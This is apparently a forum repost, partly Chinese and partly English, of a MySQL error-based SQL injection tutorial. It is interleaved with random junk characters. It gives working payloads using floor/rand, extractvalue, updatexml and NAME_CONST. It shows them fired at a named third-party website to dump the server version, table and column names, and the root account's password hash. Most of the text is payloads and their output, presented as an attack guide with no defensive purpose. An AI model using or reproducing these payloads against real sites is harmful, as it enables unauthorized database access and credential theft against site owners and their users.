|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
# [: l& j# u, N* k7 d6 t# G首先进行正常查询: mysql> select * from article where id = 1;
' P, U+ f7 P5 G: Q+ k* Q3 x+—-+——-+———+
8 Y1 I8 v9 e0 {) `8 ~| id | title | content |
7 E* ?2 `' M* V: y+—-+——-+———+
7 u! A4 i1 q8 T| 1 | test | do it |; o# a+ v$ w6 ~; X& m2 z
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
7 T# Y- Z7 r8 n/ W' sERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。1 M, H0 a/ [, f
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);$ Q: O" X! R6 m
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));! X# _8 ^3 o0 z) {- L0 s9 c% w
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue3 I4 L2 p, Q, t$ F, k: }
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
6 ]8 B: T/ B6 V- m+ e: @( DERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ , Y) b, |& e9 \( g
* `, E6 T/ [* m/ j, d" k p! {9 M再收集: " M! D8 j' ~, i1 d
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
) X. b( E! g& ?9 z9 e q) D: z6 l9 e+ m
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
# [5 v: @3 s3 S/ f8 [
$ M6 H" g% E# p/ L/ ^: Q8 n2 @http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)2 {/ C- R1 p2 n
" \1 `, X! F% N {Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
b' o. d# n r: w5 K4 S
: T9 K- G$ _* A# xMYSQL高版本报错注入技巧-利用NAME_CONST注入
6 i! h8 I3 P7 L& ?- ^0 ]It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. / J( C5 ]( z1 e0 |
% z' Z b5 R2 `# w: }4 @
( S# ~5 ]" m3 l+ N+ x
相关信息
$ v0 x+ D: h; C+ B% i$ v7 A
+ I" R2 q" ~; Q' FNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that." m! K9 |5 E7 w6 H" R D0 _
4 P \% ?/ p0 d8 M
Code:) b! z" y: F0 _1 I' y
NAME_CONST(DATA, VALUE)! t( P% Z& |; ]$ n6 k3 C3 B q8 u
- ?3 P6 D0 ?2 \3 f! `* O/ f( Y
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
V( ?" y9 F2 M3 H
. p4 ?* y9 L% ]9 lSELECT NAME_CONST('TEST', 1), |* t. M' A/ Z
K4 F6 P! J" x7 k, O2 q/ g
. i/ H$ V1 H: x$ {9 ?9 X: a6 a, }) p% c5 C
|---------------|
3 V9 s/ {8 C; n) l# U2 T0 n| TEST |
/ N6 I6 y$ ^0 i' e! `3 a3 t| | }' e/ S! n: c1 b( G
|---------------|( r m8 z% f8 T$ q$ F% y
| 1 |. j1 b3 d; Y: E3 J" h
| |
3 ~( e! Z! G4 D& ^7 m# s|---------------|9 q* Q4 M9 J0 y) R" b8 l
! |; Y3 Q1 Q. O2 i7 B! ^! C* j0 t" s& k0 u; x8 @9 L" [! U5 h, [
0 q( z4 v$ `: {7 I( B0 A. \# {
* b4 |1 {! X" D- vhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
3 L/ L% V4 M* v2 n, {4 XIntro to MySQL Variables7 D' u$ Z; u; W- b( z
: n2 P7 |* {0 `2 _& y! ~ NOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
5 H# h2 r1 |, P: P! t) Z
# x& Y% @6 [5 c; C e' MCode:* g/ ?1 b/ b3 n8 F: \
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261& b$ T( v1 j% R) [$ D+ D, b: s7 s
8 {+ [. l- W# n' a% b, ?; x: g9 b H
% m" C9 g9 I# p0 ^9 t9 v/ C/ T
& h6 K% {+ T1 ^; h5 F E$ Y0 D
# m# t5 M6 z% c, F
! ^5 K) d. g' }6 I2 b9 fCode:* p0 F3 @! v+ @3 r. x
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--4 W; k2 c8 B4 ?7 A" h6 i+ p7 y% N
' q: Z/ `* Z# ~0 y7 `& s+ p& ]+ d; W2 E, u3 g$ v! y( o
VAR = Your MySQL variable.
, _; Q: Y9 N" f3 R c+ h# w! N, r
1 i- Y8 @- w1 E7 g( @MySQL 5.1.3 Server System Variables
' m' g+ Z% e8 G! Q" f7 o1 w1 l( u2 Y& E+ a) V9 |2 V' S6 ?# Q
Let's try it out on my site..
4 a) p% P; w: j4 K
- \" t% j9 s" s, g6 X, ~2 LCode:: ?( C( u, I/ y+ g, y; P/ v3 p
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
/ ? s6 @4 u$ o% A
x3 a! d- o& Z9 X# u- C5 uErroruplicate column name '5.0.27-community-nt'& | N7 ]7 o$ H# m% ]1 O
4 F5 _( r8 P/ t' n4 A: s4 r3 U: y9 l3 _. T+ r4 l
L- ^9 E" I" s7 n, S6 ], ^7 [) l h( G) `& h0 @; s4 l, |
6 ] U8 P7 U. z+ o
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...0 `8 P% t* M. S% A( J8 C$ y
! a/ M% i6 |3 h4 l' k" u& w5 iData Extraction
6 ~% i9 Y$ P# Q3 e" Z, l. ]& K- |1 z
- a: Q4 I7 }* y0 ^# o* _7 \Code:
) D" y- H* A6 l, B! f/ w, U+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--! D) i. L. m9 l, [( E7 ]
6 B0 b, X5 y/ \- m4 K" V
A! w, Z) v5 W$ h. J* _ SWe should get a duplicate column 1 error...% J' p* }- p4 N$ |+ q& g9 Q
6 r. b" V" C7 |Code:4 V+ b$ [% n0 ]1 ?2 C4 f9 ]
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--+ t! Y2 T; V0 F6 E2 \ i; [
+ ~/ N* X t3 U2 [: j8 k1 U* [6 @$ r
Erroruplicate column name '1+ H7 d" j1 V/ J; |
! K g# @5 K% H' n& X5 W9 z
9 N1 C" j, M% s. j1 M6 t1 x' w8 _% Q& s7 a# i
: `. v; w, A: S \5 o7 P% |6 E+ P) x5 b: G# `7 Q+ m' U
9 Z" N0 |- w! \1 L% d: l4 J
Now let's get the tables out this bitch..
1 c- q# a' {; r4 d3 j
/ e& l* U+ k7 Z- u- w) O9 n" ZCode:
5 A) W& @7 i# b; ]3 j! Z8 F* Q+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--( `7 z3 I. D8 R1 b
d0 i- ^- l. x1 f/ q
# g0 b& ]4 i; m4 f+ c2 BLet's see if it works here, if it does, we can go on and finish the job.) v& W M! q4 m8 ~" Y- |* t* S \
) Z' ?8 a& R1 J. T
Code:
4 _0 e+ d$ `& C2 [ o7 z, Nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--+ C. A1 z. z7 t( B$ p3 `
9 l! e6 L @" @1 G8 a
& S2 }& F8 L: h8 H! f% Z. D' M: }% sErroruplicate column name 'com_admanage3 V$ m J- Q ^5 S! r2 m& {/ [
+ E& q$ j6 Z6 i% k/ G& W3 w* T B3 Z' D' O) c, p& o$ M5 S
" ^3 y& m$ f5 D' U, I$ l3 L
% ?2 }. {+ {& k1 a0 r" C4 w- [7 S- G ]) R' v8 E
+ P6 ~9 h, a7 q5 g' M$ z
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.2 E2 B i% y2 ~+ z
( a4 N- Z+ N. r0 ^8 `Let's get the columns out of the user table..
4 q6 L- @) }5 q/ Z: R
: }( Z3 n) F6 m" kCode:+ {6 J; c P2 J W% G% K
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--2 t' u# \& h/ Q2 _
, S' F8 U: k4 H5 z1 K' o. Z/ }9 H
! N) \* L) \1 o$ `, x+ B5 p
So mine looks like this, and I get the duplicate column name 'Host'.: s, N* y% Q8 F$ n+ A" ^
6 i6 g4 ^- _* f' U2 s
Code:) c3 k; x, j& J) l! N& ]
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
) B, a9 x) w0 V- a: @: Y" k0 X. J4 z) `3 W3 n
Erroruplicate column name 'Host'- i4 P4 P6 R7 h+ f
; U4 o; Q; n3 v% P L( m
1 J. q8 {& `4 I; W9 A) {* M+ b/ x: i* H* n
& H* m1 O j8 _
# ~1 i' v8 u7 t; g$ X/ o) V
" \/ V R3 R: q) e0 c2 G* gWoot, time to finish this bitch off.
) s5 o# I# h |# m& y) e
! Q+ T* w) Z9 ~$ D$ y# g: o) ACode:- M$ y( {' y2 X3 E' Q; j3 `
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
C# [+ B) t0 ?1 u. T* E) q8 W1 g) _- k% r# l
+ i/ W$ ]% K# N3 tSo mine looks like this...
* e0 a, h. K2 |, C5 ]" V& O
: F g* @& ^" {, w, {Code:
) D* C& a7 T+ ]3 Q2 g) hhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
$ R# z8 y6 ^4 K/ S
; e( R: c) z) Y# |4 @) lErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'4 @7 P/ [% F1 p, P" c% j- t; i! Y
4 M' d) ~/ e, z0 J( z
2 J8 T) J3 K. z# z
/ Y3 [' H8 `6 C, C: W3 L0 Q
. Q. [. n; B" c' T' K' t
5 I& ~3 ~3 p' c: _' c4 `. @! z; m$ a9 U" L
And there we have it, thanks for reading.- w5 b+ C/ N3 i8 u% c/ u
: z {: X/ }- Z# ~
|
发表于 2015-11-11 19:03:37
收藏
支持
反对